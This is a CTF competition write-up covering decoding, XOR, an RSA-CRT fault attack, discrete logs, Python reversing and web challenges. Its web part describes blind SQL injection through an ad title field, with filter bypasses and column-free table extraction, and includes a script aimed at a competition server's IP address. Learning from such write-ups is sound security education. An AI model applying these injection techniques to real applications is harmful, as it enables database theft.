2022 Guangdong University Students' Attack and Defense Competition Writeup

MISC

复合 (Composite)

Try exporting the HTTP objects from the packet capture.

Both the file types and the file names turn out to have been changed.

[image: image-20240429145608363]

Renaming pass.md to pass.zip gives a file that will not open.

Add the missing file header: a ZIP archive starts with the local-file-header signature `PK\x03\x04` (bytes `50 4B 03 04`), which has been stripped from this file.

[image: image-20240429145938762]

Unzipping it gives:

```
Emklyusg=E2=80=82gni=E2=80=82bvvymlag=E2=80=82tsqic=E2=80=82colz=E2=80=82jx=
moxvl=E2=80=82tiwhz=E2=80=82ebmee,=E2=80=82Zhjeoig=E2=80=82Krpvpi-Zgvlyvx=
=E2=80=82Evdr=E2=80=82or=E2=80=82olv=E2=80=82Rbtm=E2=80=82bl=E2=80=82Gcscck=
h=E2=80=82une=E2=80=82fz=E2=80=82e=E2=80=82tftstrtkdrx=E2=80=82rxeb=E2=80=
=82suv=E2=80=82olfqx=E2=80=82dpb=E2=80=82tizh=E2=80=82km=E2=80=82kliq=E2=80=
=82ox=E2=80=82hsjr:=E2=80=82mom=E2=80=82luyik,=E2=80=82kfx=E2=80=82dwhrh-wi=
=E2=80=82iympwagp,=E2=80=82vru=E2=80=82ral=E2=80=82qzveomvlm.=E2=80=82Aw=E2=
=80=82fgc=E2=80=82olrr=E2=80=82fhvl=E2=80=82nivpkf=E2=80=82vhzr=E2=80=82vvj=
jvqlpwagpn=E2=80=82jrje=E2=80=82pvgu=E2=80=82xcijc=E2=80=82vhbrmsmmvq=E2=80=
=82bz=E2=80=82vbz=E2=80=82xj=E2=80=82jrsea=E2=80=82bukq=E2=80=82wyk=E2=80=
=82kxymye=E2=80=82xj=E2=80=82hvqvyqok=E2=80=82xcid.=E2=80=82Uav=E2=80=82jro=
rb=E2=80=82cfsgn=E2=80=82knt=E2=80=82oisn=E2=80=82uahb=E2=80=82vz=E2=80=82m=
n=E2=80=82pzix=E2=80=82aw=E2=80=82ok=E2=80=82sgh?=E2=80=82Nfh=E2=80=82aznor=
zh=E2=80=82zl=E2=80=82plagkvi=E2=80=82wtgxubvlmx=E2=80=82qvbbjqak=E2=80=82h=
vvvq=E2=80=82gvb=E2=80=82gxc=E2=80=82os=E2=80=82sc=E2=80=82khbvurvp?=E2=80=
=82Wjtn=E2=80=82qf=E2=80=82rmai=E2=80=82zq=E2=80=82yhvggwomt.Ygk=E2=80=82eu=
u=E2=80=82gvyxfm=E2=80=82bx=E2=80=82vt=E2=80=82xci=E2=80=82kylr-weoiixvb=E2=
=80=82btxrxeommc=E2=80=82hm=E2=80=82kbtxzqgmkhzl=E2=80=82siymtggl=E2=80=82k=
nt=E2=80=82xmycw=E2=80=82vsivs=E2=80=82xci=E2=80=82mgkacr=E2=80=82uj=E2=80=
=82kekgxukr?=E2=80=82Kzzr=E2=80=82scyvzr=E2=80=82seiexcw-jiek=E2=80=82mimkg=
taqikw=E2=80=82ns=E2=80=82xpxhbye=E2=80=82migictzmq=E2=80=82zlz=E2=80=82tic=
lzcek,=E2=80=82tccjgvpiay=E2=80=82azvv=E2=80=82dttwhypt=E2=80=82xzkx-kzvbii=
,=E2=80=82xiybumq=E2=80=82zs=E2=80=82nivi=E2=80=82xmnvimzrtw=E2=80=82bu=E2=
=80=82iyr=E2=80=82xcmeel,=E2=80=82jiek=E2=80=82sa=E2=80=82trrblvgy=E2=80=82=
tmsdgglvgrc=E2=80=82vqflz=E2=80=82aprs.=E2=80=82Xj=E2=80=82wlaa=E2=80=82wme=
ysiw,=E2=80=82kfx=E2=80=82apbakcx=E2=80=82fd=E2=80=82kliqorb=E2=80=82e=E2=
=80=82emolt=E2=80=82zgc=E2=80=82nivk=E2=80=82t=E2=80=82wzblpdkrrx=E2=80=82d=
ifzi=E2=80=82jj=E2=80=82kgfl.=E2=80=82Eue=E2=80=82wkieb=E2=80=82avcey=E2=80=
=82vzeuggn=E2=80=82iouyo=E2=80=82ayym=E2=80=82umikv=E2=80=82cegnxumq?=E2=80=
=82Zldw=E2=80=82hsxzbvur=E2=80=82cej=E2=80=82zxlv=E2=80=82rrslyvlmsg=E2=80=
=82ntwriicw=E2=80=82vdrx=E2=80=82xci=E2=80=82pctya=E2=80=82oe=E2=80=82xcsjc=
=E2=80=82pow=E2=80=82hyi=E2=80=82gmkckhbhxi=E2=80=82dr=E2=80=82dcwpknr=E2=
=80=82iyytympwa.=E2=80=82
```

The repeated `=E2=80=82` runs (the quoted-printable form of the UTF-8 bytes of U+2002 EN SPACE, used here instead of ordinary spaces) and the `=` soft line breaks show this is quoted-printable encoding. Decoding it and turning the en spaces back into spaces gives:

```
Emklyusg gni bvvymlag tsqic colz jxmoxvl tiwhz ebmee, Zhjeoig Krpvpi-Zgvlyvx Evdr or olv Rbtm bl Gcscckh une fz e tftstrtkdrx rxeb suv olfqx dpb tizh km kliq ox hsjr: mom luyik, kfx dwhrh-wi iympwagp, vru ral qzveomvlm. Aw fgc olrr fhvl nivpkf vhzr vvjjvqlpwagpn jrje pvgu xcijc vhbrmsmmvq bz vbz xj jrsea bukq wyk kxymye xj hvqvyqok xcid. Uav jrorb cfsgn knt oisn uahb vz mn pzix aw ok sgh? Nfh aznorzh zl plagkvi wtgxubvlmx qvbbjqak hvvvq gvb gxc os sc khbvurvp? Wjtn qf rmai zq yhvggwomt.Ygk euu gvyxfm bx vt xci kylr-weoiixvb btxrxeommc hm kbtxzqgmkhzl siymtggl knt xmycw vsivs xci mgkacr uj kekgxukr? Kzzr scyvzr seiexcw-jiek mimkgtaqikw ns xpxhbye migictzmq zlz ticlzcek, tccjgvpiay azvv dttwhypt xzkx-kzvbii, xiybumq zs nivi xmnvimzrtw bu iyr xcmeel, jiek sa trrblvgy tmsdgglvgrc vqflz aprs. Xj wlaa wmeysiw, kfx apbakcx fd kliqorb e emolt zgc nivk t wzblpdkrrx difzi jj kgfl. Eue wkieb avcey vzeuggn iouyo ayym umikv cegnxumq? Zldw hsxzbvur cej zxlv rrslyvlmsg ntwriicw vdrx xci pctya oe xcsjc pow hyi gmkckhbhxi dr dcwpknr iyytympwa.
```

Rename flagggggg.exe to .doc:

[image: image-20240429145753023]

FLAG.png is actually the installer for the Everything search tool.

That gives the key: everything

Vigenère decryption with that key:

```
Arguably the greatest novel ever written about aging, Gabriel Garcia-Marquez Love in the Time of Cholera may be a challenging text for those who need to read it most: the young, the would-be rational, and the impatient. To say that many health care professionals fall into these categories is not to fault them but merely to describe them. Who being young can know what it is like to be old? Who trained in western scientific medicine dares not try to be rational? Flag is life is fantastic.And who caught up in the task-oriented imperative of contemporary medicine can truly claim the virtue of patience? Even before managed-care initiatives so greatly increased the pressure, physicians were famously time-driven, trained to seek efficiency in all things, care of patients prominently among them. To such persons, the thought of reading a novel may seem a profligate waste of time. Why spend hours reading about what never happened? This question has been eloquently answered over the years by those who use literature in medical education.
```

Flag is life is fantastic

flag{life_is_fantastic}
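Worked example (added here; it is not part of the original writeup): decoding the quoted-printable blob and undoing the Vigenère cipher in one script. The sample is the first two lines of the blob above, embedded as a byte string; the key `everything` is the one recovered from the Everything installer. Assumed details: the cipher keeps letter case and skips non-letters (the decrypted text above confirms both), and the `=E2=80=82` sequences are U+2002 EN SPACE standing in for spaces.

```python
import quopri

# Constructed sample: the first two lines of the captured quoted-printable
# blob, exactly as they appear, including the "=\n" soft line breaks.
QP_SAMPLE = (
    b"Emklyusg=E2=80=82gni=E2=80=82bvvymlag=E2=80=82tsqic=E2=80=82colz=E2=80=82jx=\n"
    b"moxvl=E2=80=82tiwhz=E2=80=82ebmee,=E2=80=82Zhjeoig=E2=80=82Krpvpi-Zgvlyvx=\n"
)
KEY = "everything"   # key hidden in the Everything installer (FLAG.png)


def decode_qp(blob: bytes) -> str:
    """Undo quoted-printable (soft breaks, =XX escapes), then turn the
    U+2002 EN SPACE characters the challenge used back into plain spaces."""
    text = quopri.decodestring(blob).decode("utf-8")
    return text.replace("\u2002", " ")


def vigenere_decrypt(ct: str, key: str) -> str:
    """Classic Vigenère: the key index advances only on letters, case is
    preserved, and spaces/punctuation pass through unchanged."""
    out, j = [], 0
    for ch in ct:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = ord(key[j % len(key)].lower()) - ord("a")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            j += 1
        else:
            out.append(ch)
    return "".join(out)


def recover(blob: bytes, key: str) -> str:
    """Full pipeline: quoted-printable -> en-space cleanup -> Vigenère."""
    return vigenere_decrypt(decode_qp(blob), key)


if __name__ == "__main__":
    print(recover(QP_SAMPLE, KEY))
```

Skipping the en-space normalisation would not break the Vigenère step (U+2002 is not a letter), but it would leave invisible non-ASCII characters in the plaintext, which is exactly the kind of thing that makes a flag fail to submit.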

EasySteg

flag

[image: image-20240502123715779]

Reverse it:

hide

After that I did not know how to continue. Is there any expert who can help?

CRYPTO

crypto-xor2

Challenge description: "Cyclic XOR encryption, can you crack it? Format: flag{}"

The download contains a .py file and a text file.

From the description this is a plain XOR cipher; the script cycles a 4-byte key over the flag:

```python
from secret import flag

key = "xxxx" # not real key

cipher = ""
for i, c in enumerate(flag):
    cipher += chr(ord(c) ^ ord(key[i%4]))

with open("cipher", "w") as f:
    f.write(cipher)
```

[image: image-20240429142257505]

First print the raw cipher bytes, then XOR them back with the same key in the same pattern (XOR is its own inverse, so the encryption loop doubles as the decryption loop). The placeholder key `xxxx` in the distributed script turns out to be the real key: XORing the first four cipher bytes `1e 14 19 1f` with the known prefix `flag` gives `78 78 78 78`, i.e. `xxxx`.

```python
key = "xxxx"

# dump the raw bytes of the cipher file (it was written as text, so read it back as bytes)
with open("cipher", "rb") as f:
    for line in f:
        print(line)
# b'\x1e\x14\x19\x1f\x03\x1e\x1b\x1b\x1aHNNMU\x1a\x1b\x1dMU\x1cKJAU\x19\x1b\x19OUAAIOA\x1a\x1c\x1bA\x1d\x1cK\x05'

ciphertext = b'\x1e\x14\x19\x1f\x03\x1e\x1b\x1b\x1aHNNMU\x1a\x1b\x1dMU\x1cKJAU\x19\x1b\x19OUAAIOA\x1a\x1c\x1bA\x1d\x1cK\x05'
plaintext = ""
for i, c in enumerate(ciphertext):
    plaintext += chr(c ^ ord(key[i % 4]))   # same cyclic XOR undoes the encryption
print(plaintext)
# flag{fccb0665-bce5-d329-aca7-99179bdc9ed3}
```
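Added example (not from the original writeup): instead of trusting the `xxxx` placeholder, recover the key from the known plaintext prefix `flag{` that the challenge format guarantees. The ciphertext is the byte string printed above; key length 4 comes from the encryption script, and `candidate_key_lengths` shows how much the prefix alone can confirm.

```python
# Ciphertext bytes as printed by the solve script (42 bytes).
CIPHER = (b'\x1e\x14\x19\x1f\x03\x1e\x1b\x1b\x1aHNNMU\x1a\x1b\x1dMU\x1cKJAU'
          b'\x19\x1b\x19OUAAIOA\x1a\x1c\x1bA\x1d\x1cK\x05')
KNOWN_PREFIX = b"flag{"         # the flag format given in the challenge description


def xor_cycle(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; it is its own inverse, so it both encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(cipher: bytes, known: bytes, key_len: int) -> bytes:
    """Known-plaintext attack: key[i] = cipher[i] ^ plaintext[i].
    Known bytes beyond key_len act as a consistency check on key_len."""
    if len(known) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext")
    key = bytes(c ^ p for c, p in zip(cipher[:key_len], known))
    for i, p in enumerate(known):
        if cipher[i] ^ key[i % key_len] != p:
            raise ValueError("known plaintext is inconsistent with key_len=%d" % key_len)
    return key


def candidate_key_lengths(cipher: bytes, known: bytes, max_len: int) -> list:
    """Key lengths that the known prefix can check (shorter than the prefix)
    and does not contradict. Longer keys cannot be judged from the prefix."""
    found = []
    for key_len in range(1, min(max_len, len(known) - 1) + 1):
        try:
            recover_key(cipher, known, key_len)
            found.append(key_len)
        except ValueError:
            pass
    return found


if __name__ == "__main__":
    key = recover_key(CIPHER, KNOWN_PREFIX, 4)
    print(key, xor_cycle(CIPHER, key))
```

Because all four key bytes are equal, the cipher collapses to single-byte XOR, which is why every length from 1 to 4 passes the consistency check; with a real 4-byte key only length 4 (and its multiples) would survive.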

RSA Fault

The challenge is based on a fault injected into RSA-CRT decryption (here used as signing). Normally RSA-CRT decryption runs as:

  • compute $m_p = c^{d_p} \bmod p$
  • compute $m_q = c^{d_q} \bmod q$
  • recombine $m_p$ and $m_q$ with the CRT to get the plaintext $m$ modulo $n$

This challenge follows the same flow, except that a fault occurs while the exponent is used:

```python
from secrets import randbelow

def fault_signature(m,dp,p):
    bits = list(range(dp.bit_length()))
    # Random Errors: flip two distinct bits of the exponent
    for i in range(2):
        dp ^= 1 << bits.pop(randbelow(len(bits)))
    return pow(m,dp,p)
```

In other words, while computing $m_p$ and $m_q$, two random bits of $d_p$ and of $d_q$ are flipped (`bits.pop` guarantees the two positions differ). What does that do? Take $d_p$ as the example and look at how the faulty result relates to the correct one. Suppose that after the fault bit $i$ of $d_p$ goes from 1 to 0 and bit $j$ goes from 0 to 1 (other flip directions only change the signs); then

$$d_p' = d_p - 2^i + 2^j$$

So the correct $m_p$ when computing the plaintext should be:

$$m_p = c^{d_p} \pmod p$$

while after the fault it becomes:

$$m_p' = c^{d_p'} = c^{d_p - 2^i + 2^j} \pmod p$$

that is:

$$m_p' = m_p \cdot c^{-2^i + 2^j} \pmod p$$

That is the relation between the correct value and the faulty one. How is it exploited? Look at the CRT recombination:

```python
def fast_sign(p,q,m,d):
    Sp=fault_signature(m,d%(p-1),p)
    Sq=fault_signature(m,d%(q-1),q)
    q_inv_p=inverse(q,p)
    return Sq+((Sp-Sq)*q_inv_p%p)*q
```

Solve script (exp):

```python
from Crypto.Util.number import *
from tqdm import *
from gmpy2 import powmod

n=574370586922196377355321224190746373039960224108385243176501127428241048239267855106791452531127716395867009150959315133488286007016233693579335880694651355103104937242790643593308890788070770218317565926178413379641001140239463599845984585594216005669250735996427555432706918692021991171275999765908594644925310142503285857206438695393554469523893825536665449736024054747514990216868678037268511584416901858031484008394871632441625217801474466940448366132590034239161293582715621533020233700914500451000518789317508997706548731775994224900635411275356861073588492237057246039324320408280417962081059669609944892848853780428862986621290797973749713412083663630592820568996851852624888672199864050563167321198235872086549523724070759241183192416218511190119068501395848056263721692763920519420483450363920749842894919641617223824549955451175853298676915196907992214900910995739550922989640910170960485331090144764984190331659966983894284549074935918333832010695306946738396909292095557434605170122130253447970074530010535669698871315126545879037607033278200101983233974781109773521793185318497615158089955239305362817170200396186939592803861438759399366317967907276433739944705398688186125687434884160720331949648831768235019520753051
c=362746477666691362768020792694001662947338474716913368693174463002520197020564066827257658031973928782798475691408938544507860754837561076547768524746177804704585961840013195670850383664598530250844247051357401431355747035161872296498272254812117528152035029837329888665483050219346048506686826529658339084796751613191344103470399897412327265769031997892130002446603232458409236206943209821169103651387451247194645094911282908657256087747570185214886614187576679719039472798093505360214315789098466937327166004179112376884521755838649234980317596136131856395020357496102439866802500120832803908679095031213229175799928906606183829594039803465175754892790016569054202014492252632598390521485126555541028488750683218149923230255353856768460065582373942152212466578732981079533510158716511814895961705462125751613632997737277288382147402327477915047046907933387151859100428914053565582939275934201969543786806286829008145312080251388532179582069076383305307261868697565579486745927759554919760999971562169014832448067746716988944857402974596263631030324458073601261131647030891982010744785938573077302132228457909917393551651580730603193283673617373961392738841147569262489888662190518624689563339261875140574320207133638608459439737908
e=65537
# m_ is the faulty CRT signature of c; by the derivation above S'^e = c^(1 + e*(±2^i ± 2^j)) (mod p)
m_=181132170825291068274428850998643597061484670852441092778734815200952945165798640567559048182854905384108012241001865806757291292964878403693878633267090257939702439086938795033128278779133834594418004509584542651057754389391530368493133213945631248904554493258521520798694334742694993906802448945319763766711250429667767598356479263059390167552213786607866923685142648716071350485727194734337940552363833868066952302121733855882534848604214379852034329599650298994536987432597047148545264456233041626319601655687038246563924371156826280023920057214856878486989521822479101902273314188727929753114744387793613654594486456078456745565816416446216301510436912147365878585967444947975888852483708054850555285865986707367641310078228756765470506112047816213856326341605584860221570211438661212837691148838965467195299751453604986777239749470579607668379117939736929002608940866262332919423512927188694030664492052057406513313547841154542784730283602499247284074861014689921502985853652524070575242018309321538365113665998744193304726118797289396908257027371761721071940141406755037691084908985405935268861122559095563199460082893754126987724947094729974089127671509635467188911500940561377499209529543406027692937688249517323189766222196


if(0):
    # search for the two flipped bit positions and their signs;
    # disabled after the first run, the p it found is pasted below
    temp = pow(m_,e,n)*inverse(c,n) % n
    is_positive = [(1,1),(1,-1),(-1,1),(-1,-1)]
    for i in trange(1,2**9):
        for j in range(1,2**9):
            for k in is_positive:
                pow1 = k[0] * (1 << i)
                pow2 = k[1] * (1 << j)

                powpow = e*(pow1+pow2)
                temp1 = powmod(c,powpow,n)
                if(GCD(temp-temp1,n) != 1):
                    print(GCD(temp-temp1,n))
                    exit()

p = 22729650064982784569842293886112765216527000770423090114368848726216608009470242046289112001066994207864986803275467348289746127450153723652496430471357120041795298501429299577023455880461653074271752126909063527106805373676824002441432786073264913608717964699805549233067291369590239167126966358735428766668880762276154481715084785307608648063807156963867353713246912838175911702373808989338864178007028831198106910117378309595596445705841624769259901086135441435201197082487810720560245568126972348046187117147996691190165006379956721543713979012391623875001928207563847027939516349080119621035628223197354404395029
q = n // p
phi = (p-1)*(q-1)
d = inverse(e,phi)
print(long_to_bytes(pow(c,d,n)))
```

flag{r$a_fault_w1th_C5T_m3thod_01a7da73}
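Added example (not the challenge's or the author's code): the same two-bit fault model on a toy key, with the factor recovery the exp above performs. The primes are the Mersenne primes 2^61-1 and 2^89-1, chosen small so the delta search finishes in seconds; the message, the seed and e are constructed. `recover_factor` uses the relation derived above, S'^e ≡ m^(1 + e·δ_p) (mod p), and `one_fault_factor` shows the simpler Bellcore case where only one CRT half is faulty and gcd(S'^e - m, n) already splits n with no search.

```python
import random
from math import gcd

# Toy parameters, constructed for this example (not the challenge's):
# two Mersenne primes, small enough that the delta search below is fast.
P = 2**61 - 1
Q = 2**89 - 1
N = P * Q
E = 65537
MESSAGE = 0x1234567890ABCDEF        # constructed message to sign


def fault_signature(m, dp, p, rng):
    """Same fault model as the challenge: two distinct random bits of dp flip."""
    bits = list(range(dp.bit_length()))
    for _ in range(2):
        dp ^= 1 << bits.pop(rng.randrange(len(bits)))
    return pow(m, dp, p)


def crt_combine(sp, sq, p, q):
    return sq + ((sp - sq) * pow(q, -1, p) % p) * q


def faulty_crt_sign(m, d, p, q, rng):
    """Both halves faulty, as in the challenge's fast_sign."""
    sp = fault_signature(m, d % (p - 1), p, rng)
    sq = fault_signature(m, d % (q - 1), q, rng)
    return crt_combine(sp, sq, p, q)


def recover_factor(n, e, m, s_faulty, max_bits):
    """Search delta = ±2^i ± 2^j (i < j). For the true delta_p,
    S'^e ≡ m^(1 + e*delta_p) (mod p), so gcd(S'^e - m^(1 + e*delta), n)
    is p (or q, if delta_q happens to be hit first). O(max_bits^2) modexps."""
    lhs = pow(s_faulty, e, n)
    m_inv = pow(m, -1, n)              # for negative exponents
    for i in range(max_bits):
        for j in range(i + 1, max_bits):
            for si in (1, -1):
                for sj in (1, -1):
                    exp = 1 + e * (si * (1 << i) + sj * (1 << j))
                    rhs = pow(m if exp >= 0 else m_inv, abs(exp), n)
                    g = gcd((lhs - rhs) % n, n)
                    if 1 < g < n:
                        return g
    return None


def one_fault_factor(n, e, m, s_faulty):
    """Bellcore case: only one CRT half is wrong, so S'^e ≡ m modulo the
    other prime and a single gcd splits n."""
    return gcd((pow(s_faulty, e, n) - m) % n, n)


def demo(seed=2022):
    rng = random.Random(seed)
    d = pow(E, -1, (P - 1) * (Q - 1))
    s_bad = faulty_crt_sign(MESSAGE, d, P, Q, rng)
    return recover_factor(N, E, MESSAGE, s_bad, max_bits=Q.bit_length())


def one_fault_demo(seed=2022):
    rng = random.Random(seed)
    d = pow(E, -1, (P - 1) * (Q - 1))
    sp = fault_signature(MESSAGE, d % (P - 1), P, rng)   # faulty half
    sq = pow(MESSAGE, d % (Q - 1), Q)                    # correct half
    return one_fault_factor(N, E, MESSAGE, crt_combine(sp, sq, P, Q))


if __name__ == "__main__":
    print("two-fault search found", demo())
    print("single-fault gcd gave", one_fault_demo())
```

Any gcd strictly between 1 and n is a genuine factor, so a coincidental hit on a wrong delta is harmless; the only failure mode is δ_p = δ_q, where the gcd is n itself and the loop skips it. With the challenge's 1024-bit halves the same search is 2^9 × 2^9 × 4 modexps, which is what the `trange` loop in the exp does.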

EzLog

Solve script (Sage syntax: `^` is exponentiation, and `prod`, `Mod` and `discrete_log` are Sage built-ins):

```python
from Crypto.Util.number import *

p = 100380180012669637378744942171261398091918624065560475592116442008723831000724625143134783707140522784290998397673597179788440926203643287774297527809892664834392514365222771089497090006645985087685142898313371176199974996077656302299931624478967894041880873282005346940525877863969908284953093553124147377177
g = 5
y = 96684738736980459903034929785324785968796025930893469779531286222406396988966715592949333235326832011076688325476630562163362584667393368651336925308324274452289994386658111183814813840211779123227496106401048680166365937882835154692663834966767665274167877263256747696012785293060701554746392300871850636481
factors = [3^2,56989,60217,538687139,560945999,571334087,610502371,631183649,632950873,635821279,650856469,655219333,656624429,681519161,718737731,731233123,733484177,763003931,789196883,819494821,819518603,844402217,857626969,895870279,907446997,908829937,950563309,972564941,1030070381,1048221233,1063554559]
phi = prod(factors)      # smooth divisor of p-1 (about 860 bits)
h = (p-1) // phi         # the rough cofactor

#part1 Pohlig-Hellman in the subgroup of order phi gives m0 = m mod phi (Sage discrete_log)
m0 = discrete_log(Mod(pow(y,h,p),p),Mod(pow(g,h,p),p),ord = phi)


#part2 guess the message ends with "}." followed by 13 bytes of padding (each byte == padlen)
padlen = 13
suffix = bytes_to_long(b"}." + long_to_bytes(padlen)*padlen)
length = padlen + 2
m1 = (m0-suffix)*inverse(256^length,phi) % phi


#part3 m = 256^length*(k*phi+m1)+suffix with k only about 44 bits, so BSGS with bounds (Sage)
y1 = y * pow(g,-(256^length*m1+suffix),p) % p
g1 = pow(g,256^length*phi,p)
k = discrete_log(Mod(y1,p),Mod(g1,p),ord = p-1,bounds = (0,2^(1024-860-length*8)))


#part4 reassemble the flag
flag = 256^length*(k*phi+m1)+suffix
print(long_to_bytes(flag))

#b'You are a master of the dlp algos! Here is your flag: flag{S0_Smooth_ord3r_pr1me_dlp!_pohlig_hellman_with_padding}.\r\r\r\r\r\r\r\r\r\r\r\r\r'
```

flag{S0_Smooth_ord3r_pr1me_dlp!_pohlig_hellman_with_padding}
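Added example in plain Python (not the Sage solve script above): the structure EzLog relies on, with constructed parameters. Here p = h·PHI + 1 where PHI is a squarefree product of small primes and h is a prime cofactor; Pohlig-Hellman in the subgroup of order PHI gives x mod PHI, and a bounded baby-step giant-step over the cofactor finishes the job, assuming x = k·PHI + x0 with k below K_BOUND. The challenge additionally shrinks that bound by guessing the padding suffix and has a prime-power factor (3^2) that needs the usual lifting step; both are omitted here.

```python
import math

# Pohlig-Hellman plus bounded baby-step giant-step, mirroring EzLog:
# p - 1 = h * PHI with PHI smooth, and x = k*PHI + x0 with k small.
# Every parameter here is constructed for the example.
SMOOTH_PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]
PHI = math.prod(SMOOTH_PRIMES)        # squarefree smooth order, about 2^43
K_BOUND = 1 << 20                     # assumed bound on the cofactor part k


def is_prime(n):
    """Miller-Rabin; deterministic for n < 3.3e24 with these bases."""
    bases = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]
    if n < 2:
        return False
    for b in bases:
        if n % b == 0:
            return n == b
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in bases:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def make_params():
    """p = h*PHI + 1 with h and p prime, g a generator of the full group."""
    h = K_BOUND + 1
    while not (is_prime(h) and is_prime(h * PHI + 1)):
        h += 2
    p = h * PHI + 1
    g = 2
    while any(pow(g, (p - 1) // q, p) == 1 for q in SMOOTH_PRIMES + [h]):
        g += 1
    return p, h, g


def bsgs(g, y, p, lo, hi):
    """Smallest x in [lo, hi) with g^x = y (mod p); O(sqrt(hi - lo)) time and memory."""
    m = math.isqrt(hi - lo) + 1
    baby = {}
    cur = 1
    for j in range(m):
        baby.setdefault(cur, j)
        cur = cur * g % p
    giant_step = pow(g, -m, p)
    gamma = y * pow(g, -lo, p) % p
    for i in range(m):
        if gamma in baby:
            return lo + i * m + baby[gamma]
        gamma = gamma * giant_step % p
    return None


def crt(residues, moduli):
    """Chinese remainder theorem for pairwise coprime moduli (Garner's form)."""
    x, M = 0, 1
    for r, m in zip(residues, moduli):
        x += M * ((r - x) * pow(M, -1, m) % m)
        M *= m
    return x % M


def pohlig_hellman(g, y, p, primes):
    """g has squarefree order prod(primes); returns log_g(y) modulo that order."""
    order = math.prod(primes)
    residues = [bsgs(pow(g, order // q, p), pow(y, order // q, p), p, 0, q)
                for q in primes]
    return crt(residues, primes)


def solve_dlp(p, h, g, y):
    """Recover x with g^x = y, assuming x = k*PHI + x0 and 0 <= k < K_BOUND."""
    # part 1: raise to h to land in the subgroup of order PHI, then Pohlig-Hellman
    x0 = pohlig_hellman(pow(g, h, p), pow(y, h, p), p, SMOOTH_PRIMES)
    # part 2: y * g^-x0 = (g^PHI)^k, and k is small enough for a bounded BSGS
    k = bsgs(pow(g, PHI, p), y * pow(g, -x0, p) % p, p, 0, K_BOUND)
    return k * PHI + x0


def demo():
    p, h, g = make_params()
    x = 12345 * PHI + 98765             # constructed secret exponent
    return solve_dlp(p, h, g, pow(g, x, p)) == x
```

The cost is sqrt of the largest smooth prime for part 1 plus sqrt(K_BOUND) for part 2, which is why EzLog is solvable at all: without the bound on k, part 2 would be a generic DLP in a subgroup of order h.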

REVERSE

pyre

Challenge description: "How does this kind of exe call Python libraries? How would you reverse it? Xiaoming, you give it a try!"

Install uncompyle6 and decompile the pyc:

```shell
pip install uncompyle6
uncompyle6 Origin.pyc
```

Which gives the source:

```python
def check():
    a = input("plz input your flag:")
    c = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152,
         78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53,
         152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
    if len(a) != 42:
        print("wrong length")
        return 0
    b = 179
    for i in range(len(a)):
        if ord(a[i]) * 33 % b != c[i]:
            print("wrong")
            return

    print("win")


check()
```

Write a brute-force script: for each target value, try every printable byte until `33 * i % 179` matches.

```python
def crack():
    c = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152, 78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53, 152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
    b = 179
    for enc in c:
        for i in range(32, 127):       # printable ASCII
            if 33 * i % b == enc:
                print(chr(i), end='')
                break
crack()
```

flag{2889e7a3-0d6b-4cbb-b6e9-04c0f26c9dca}
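Added note and example (not from the writeup): the check is the affine map x ↦ 33·x mod 179. Because 179 is prime, 33 has an inverse modulo 179 (it is 38), and every printable ASCII code is below 179, so each c[i] decodes to exactly one byte and no brute force is needed.

```python
# Values copied from the decompiled check(). 179 is prime and gcd(33, 179) == 1,
# so x -> 33*x mod 179 is a bijection on 0..178 and every printable ASCII code
# (all below 179) has exactly one preimage.
C = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152,
     78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53,
     152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
MOD = 179
MUL = 33


def invert_check(c, mul=MUL, mod=MOD):
    """Undo the affine map directly: a[i] = c[i] * mul^-1 mod 179."""
    inv = pow(mul, -1, mod)
    return "".join(chr(v * inv % mod) for v in c)


def passes_check(flag, c, mul=MUL, mod=MOD):
    """Re-implements the decompiled check() without the I/O."""
    return len(flag) == len(c) and all(ord(ch) * mul % mod == v
                                       for ch, v in zip(flag, c))


if __name__ == "__main__":
    flag = invert_check(C)
    print(flag, passes_check(flag, C))
```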

WEB

The following is pasted from other people's writeups.

Web | easy_ctf (141pt)

Pull the content out, count the characters, sort, and submit.

```python
import requests
import re

RE = re.compile(r'^([a-zA-Z0-9]*)<td>', re.MULTILINE)

def f(r):
    # count each character, then order by (count, character)
    p = {}
    for c in r:
        if c in p:
            p[c] += 1
        else:
            p[c] = 1
    a = [ (v, k) for (k, v) in p.items() ]
    a = sorted(a)
    return ''.join([ c[1] for c in a ])

s = requests.Session()
r = s.get('http://120.79.191.238:42399')

while True:
    print(r.text)
    m = re.search(RE, r.text)
    a = m.group(1)
    a = f(a)

    r = s.post('http://120.79.191.238:42399', data={'ans': a})
```

Web | easysql (833pt)

Testing shows that the ad title is injectable, using the form '||{sql}||'. After an ad is submitted you can view its details, and whether the ad displays normally tells you whether the condition {sql} is true, so blind injection works.

The title also has keyword filtering, including in, or, and, union, password and so on; and/or can be bypassed with &&/||.

Because in and or are blocked, there is no way to read table and column names from information_schema or mysql.innodb_table_stats, and MariaDB has no sys database.

So the great blind-guessing method (meaning several hours of guessing) was used: there is an ads table with 22 columns, and a users table with id, name and what feels like a password column (useless, because the admin account holds nothing).

More blind guessing (the admin md5 turned up a very similar challenge, suggesting there might be a flag field/table/database) found a flag table. Without knowing the column names, SELECT (SELECT * FROM flag) >= (SELECT 1, {string}) can be used for blind injection, which yields a flag with no case information.

A small brute force over the flag's case followed, because I am too weak to find a case-sensitive comparison (binary is filtered and MariaDB has no json).
